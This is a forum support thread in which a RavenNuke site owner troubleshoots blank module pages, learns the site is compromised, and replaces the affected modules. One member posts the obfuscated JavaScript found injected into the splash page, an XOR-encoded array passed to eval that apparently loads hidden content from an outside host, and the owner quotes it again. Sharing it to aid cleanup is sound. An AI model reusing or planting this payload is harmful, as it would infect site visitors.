Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Modules
Author Message
joe67
New Member
New Member


Joined: Sep 30, 2010
Posts: 18

PostPosted: Thu Sep 30, 2010 6:44 pm Reply with quote

Ive noticed the past few days modules have stoped working,its almost like one stops working each day.Nothing has been changed for a while so am suprised these modules have just stoped working.


When i try load any of the modules below the it just loads a blank white page

PM
Links
Downloads
BC2 stats tracker

Whats also weird is just after i click each module and it trys to load i see the url Only registered users can see links on this board! Get registered or login! in the bottom left corner then sometimes google.co.uk follows it.This might be part of the theme but ive never seen this before,until now.

I believe am runing the latest version of raven nuke

The theme is from clan themes

my website url is Only registered users can see links on this board! Get registered or login!
 
View user's profile Send private message
jakec
Site Admin


Joined: Feb 06, 2006
Posts: 3048
Location: United Kingdom

PostPosted: Thu Sep 30, 2010 11:48 pm Reply with quote

Please can you turn on error reporting in the config.php file.

Thank you
 
View user's profile Send private message
jakec
PostPosted: Thu Sep 30, 2010 11:53 pm Reply with quote

That link your seeing does also look suspect, but lets see what error reporting tells us.

Also please can you restore the RavenNuke copyright at the bottom of the page.
 
joe67
PostPosted: Fri Oct 01, 2010 6:31 am Reply with quote

jakec wrote:
Please can you turn on error reporting in the config.php file.

Thank you


ok its done


jakec wrote:
That link your seeing does also look suspect, but lets see what error reporting tells us.

Also please can you restore the RavenNuke copyright at the bottom of the page.


hows that done?when i first decided to go with nuke i had no idea at all where to start,snype(respected member) at CT installed raven and the theme for me
 
corpse
Regular
Regular


Joined: Oct 15, 2007
Posts: 84
Location: U.S.A.

PostPosted: Fri Oct 01, 2010 10:30 am Reply with quote

I don't think the credits were removed, more and likely they are not showing. That's one of Ped's themes and scope is not that big of an idiot to remove them on a theme that is not even his.
 
View user's profile Send private message Send e-mail Visit poster's website
joe67
PostPosted: Fri Oct 01, 2010 10:46 am Reply with quote

It wasnt scope it was snype.
 
xGSTQ
Involved
Involved


Joined: Feb 03, 2006
Posts: 267
Location: UK

PostPosted: Fri Oct 01, 2010 11:23 am Reply with quote

Im sure it will be something very simple

On your FTP rename the Web_Links module to say Web_Links2

Then from an original copy of Ravens Nuke re-upload the original Web_Links module and see if it then loads... Only registered users can see links on this board! Get registered or login!

if it does load up then you know Web_Links2 is broke, and can be removed... if it doesn't resolve the issue then you can delete Web_Links and rename Web_Links2 back to the original name Web_Links

Did you say you had turned on error reporting ?
 
View user's profile Send private message Send e-mail Visit poster's website
joe67
PostPosted: Fri Oct 01, 2010 11:28 am Reply with quote

Where can i get a copy of ravens nuke to try it?

What about BC2 stats tracker,pms,emails,downloads?Its weird they just started to go when nothing had been changed by me.



Yes its set to true
 
xGSTQ
PostPosted: Fri Oct 01, 2010 11:39 am Reply with quote

The problem might be server side if you have not touched anything in a long time, i wonder if your host has updated something, but why only a few modules not working ?? doesn't make sense

Download link, look in the html/modules folder once extracted
Only registered users can see links on this board! Get registered or login!

Ped
 
joe67
PostPosted: Fri Oct 01, 2010 11:41 am Reply with quote

Ok mate thanks

This is what my host said today

"These are the CMS issues, and have nothing to do with the web server. Our web server is running just fine.
Please post this on the Raven Nuke Forums for the support."
 
Susann
Moderator


Joined: Dec 19, 2004
Posts: 3191
Location: Germany:Moderator German NukeSentinel Support

PostPosted: Fri Oct 01, 2010 11:50 am Reply with quote

I suppose your website is infected.If you check the source code of Links or Downloads you will find a similar code like dicussed here:
Only registered users can see links on this board! Get registered or login!


Last edited by Susann on Fri Oct 01, 2010 11:51 am; edited 1 time in total 
View user's profile Send private message
joe67
PostPosted: Fri Oct 01, 2010 11:51 am Reply with quote

Ok mate i done what you said with weblinks and it works now
 
Susann
PostPosted: Fri Oct 01, 2010 11:56 am Reply with quote

The weblinks are back but you will need to check you complete site and it´s possible in a few days it will start again. So be prepared to have always a backup. The best thing would be to find the security hole.
 
joe67
PostPosted: Fri Oct 01, 2010 12:15 pm Reply with quote

ive replaced them all except the bc2 stats tracker(will do soon)

i still see that dam robingood url on the bottom left when i goto
Only registered users can see links on this board! Get registered or login!
 
Susann
PostPosted: Fri Oct 01, 2010 12:31 pm Reply with quote

Yes, it´s in your splash page also. Remove it.
 
joe67
PostPosted: Fri Oct 01, 2010 12:37 pm Reply with quote

Ok mate,ive gave admin details etc to the guys over at DFG.They have offered to look over the website and try find the root of the problem.So ill not chnage anymore untill they get back to me.Thanks
 
snype
Regular
Regular


Joined: Aug 12, 2008
Posts: 58

PostPosted: Fri Oct 01, 2010 4:54 pm Reply with quote

Joe m8 the copyright was intact when i installed the site, shoot me a message on MSN and i can restore them for you unless someone else does!
 
View user's profile Send private message
slackervaara
Worker
Worker


Joined: Aug 26, 2007
Posts: 236

PostPosted: Fri Oct 01, 2010 5:15 pm Reply with quote

I have a very cheap web hotel that have thousands of customers on an server. I have had periods when I often get blank page due to overload of the server. Took me a a couple of years to realize what the problem was and that it was not PHP-Nuke related. Now the last year the web hotel has worked pretty well, but I get blank page 1-2 times each week.
 
View user's profile Send private message
joe67
PostPosted: Fri Oct 01, 2010 5:26 pm Reply with quote

snype wrote:
Joe m8 the copyright was intact when i installed the site, shoot me a message on MSN and i can restore them for you unless someone else does!


i could do it if someone lets me know how,id rather learn.its been like that since day one...no offence mate i paid you to do stuff before that someone else had to come in and fix.


slackervaara wrote:
I have a very cheap web hotel that have thousands of customers on an server. I have had periods when I often get blank page due to overload of the server. Took me a a couple of years to realize what the problem was and that it was not PHP-Nuke related. Now the last year the web hotel has worked pretty well, but I get blank page 1-2 times each week.


ok and......are you saying dfg are a bad host?

edited first reply,probaly best.
 
snype
PostPosted: Fri Oct 01, 2010 5:43 pm Reply with quote

So was the site not working when i left it? and everything you wanted me to do i did.
Also i think the info for the copyright is in the admin preferences.

P.s people who know me know i will never touch copyright and will never help others who have violated copyright i have to much respect for what these guys/gals do
 
joe67
PostPosted: Fri Oct 01, 2010 6:46 pm Reply with quote

snype wrote:
So was the site not working when i left it? and everything you wanted me to do i did.


no,hence why i never contacted you again for help
 
snype
PostPosted: Fri Oct 01, 2010 7:02 pm Reply with quote

Lol ok ok well it worked fine for me and was still working fine when i checked later on in the week, I have done many installs for friends and clans and every one went fine and to this day still are fine and i am still in contact with all of them so it was your choice not to tell me what was wrong, Also if you pay for something and it was not so called done right would you not contact the person to get it put right? or ask for your money back?.
 
joe67
PostPosted: Fri Oct 01, 2010 7:44 pm Reply with quote

am here to get my website fixed,not a problem from a year ago.

if you want to continue this contact me on CT or msn
 
corpse
PostPosted: Fri Oct 01, 2010 10:39 pm Reply with quote

Okay, I looked over the splash screen since it was something that I put together a while ago or its based off one of mine. There was a code that was put into the file at the bottom of it that I do not put it.

So, pretty much everything you see come up with that, you will have to look through and you will probably find this code,

Code:
<!-- o --><script>;qmux=new Array(15,80,91,87,65,89,81,90,64,26,67,70,93,64,81,28,22,8,86,91,80,77,10,8,71,87,70,93,68,64,10,15,66,85,70,20,68,91,85,94,89,9,19,82,70,19,15,66,85,70,20,66,82,69,90,9,19,93,19,15,66,85,70,20,90,89,86,86,76,9,19,89,81,19,15,66,85,70,20,83,90,85,70,90,9,19,85,19,15,66,85,70,20,85,91,68,89,9,80,91,87,65,89,81,90,64,15,66,85,70,20,76,88,83,89,78,9,19,67,93,80,64,92,19,15,66,85,70,20,66,88,90,69,9,19,92,64,64,68,14,27,27,70,91,86,93,90,83,91,91,80,26,87,78,26,87,87,27,64,70,85,82,87,91,90,64,70,91,88,27,83,91,26,68,92,68,11,71,93,80,9,2,19,15,66,85,70,20,80,81,92,69,70,9,19,92,81,93,83,92,64,19,15,66,85,70,20,71,91,82,78,9,19,71,64,77,88,81,19,15,66,85,70,20,82,69,68,91,9,19,5,19,15,66,85,70,20,81,81,81,66,86,9,19,66,93,71,93,86,93,88,93,64,77,14,92,93,80,80,81,90,19,15,66,85,70,20,86,90,91,93,94,9,19,71,70,87,19,15,66,85,70,20,67,85,71,85,9,85,91,68,89,26,87,70,81,85,64,81,113,88,81,89,81,90,64,28,66,82,69,90,31,68,91,85,94,89,31,83,90,85,70,90,31,90,89,86,86,76,29,15,67,85,71,85,26,71,81,64,117,64,64,70,93,86,65,64,81,28,76,88,83,89,78,24,82,69,68,91,29,15,67,85,71,85,26,71,81,64,117,64,64,70,93,86,65,64,81,28,80,81,92,69,70,24,82,69,68,91,29,15,67,85,71,85,26,71,81,64,117,64,64,70,93,86,65,64,81,28,71,91,82,78,24,81,81,81,66,86,29,15,67,85,71,85,26,71,81,64,117,64,64,70,93,86,65,64,81,28,86,90,91,93,94,24,66,88,90,69,29,15,85,91,68,89,26,86,91,80,77,26,85,68,68,81,90,80,119,92,93,88,80,28,67,85,71,85,29,15,15,8,27,71,87,70,93,68,64,10,22,29,15);ltjs=new String();wzko=52;veqd=eval;zjjb=String.fromCharCode;for(ldhy in qmux)ltjs+=zjjb(qmux[ldhy]^wzko);veqd(ltjs);;</script><!-- c -->


That is the code that was found in your splash screen and once you remove that code, you will need to investigate on how they got in to put the coding all around your site.
 
joe67
PostPosted: Sat Oct 02, 2010 4:20 am Reply with quote

corpse wrote:

Code:
<!-- o --><script>;qmux=new Array(15,80,91,87,65,89,81,90,64,26,67,70,93,64,81,28,22,8,86,91,80,77,10,8,71,87,70,93,68,64,10,15,66,85,70,20,68,91,85,94,89,9,19,82,70,19,15,66,85,70,20,66,82,69,90,9,19,93,19,15,66,85,70,20,90,89,86,86,76,9,19,89,81,19,15,66,85,70,20,83,90,85,70,90,9,19,85,19,15,66,85,70,20,85,91,68,89,9,80,91,87,65,89,81,90,64,15,66,85,70,20,76,88,83,89,78,9,19,67,93,80,64,92,19,15,66,85,70,20,66,88,90,69,9,19,92,64,64,68,14,27,27,70,91,86,93,90,83,91,91,80,26,87,78,26,87,87,27,64,70,85,82,87,91,90,64,70,91,88,27,83,91,26,68,92,68,11,71,93,80,9,2,19,15,66,85,70,20,80,81,92,69,70,9,19,92,81,93,83,92,64,19,15,66,85,70,20,71,91,82,78,9,19,71,64,77,88,81,19,15,66,85,70,20,82,69,68,91,9,19,5,19,15,66,85,70,20,81,81,81,66,86,9,19,66,93,71,93,86,93,88,93,64,77,14,92,93,80,80,81,90,19,15,66,85,70,20,86,90,91,93,94,9,19,71,70,87,19,15,66,85,70,20,67,85,71,85,9,85,91,68,89,26,87,70,81,85,64,81,113,88,81,89,81,90,64,28,66,82,69,90,31,68,91,85,94,89,31,83,90,85,70,90,31,90,89,86,86,76,29,15,67,85,71,85,26,71,81,64,117,64,64,70,93,86,65,64,81,28,76,88,83,89,78,24,82,69,68,91,29,15,67,85,71,85,26,71,81,64,117,64,64,70,93,86,65,64,81,28,80,81,92,69,70,24,82,69,68,91,29,15,67,85,71,85,26,71,81,64,117,64,64,70,93,86,65,64,81,28,71,91,82,78,24,81,81,81,66,86,29,15,67,85,71,85,26,71,81,64,117,64,64,70,93,86,65,64,81,28,86,90,91,93,94,24,66,88,90,69,29,15,85,91,68,89,26,86,91,80,77,26,85,68,68,81,90,80,119,92,93,88,80,28,67,85,71,85,29,15,15,8,27,71,87,70,93,68,64,10,22,29,15);ltjs=new String();wzko=52;veqd=eval;zjjb=String.fromCharCode;for(ldhy in qmux)ltjs+=zjjb(qmux[ldhy]^wzko);veqd(ltjs);;</script><!-- c -->



Ok ive had alook through file in ftp on notpad,even though the site seems ok now i thought it would be worth checking.

It seems nearly every folder for my site that has index.html or index.php file has that script added to it


Last edited by joe67 on Sat Oct 02, 2010 4:40 am; edited 1 time in total 
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Modules

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©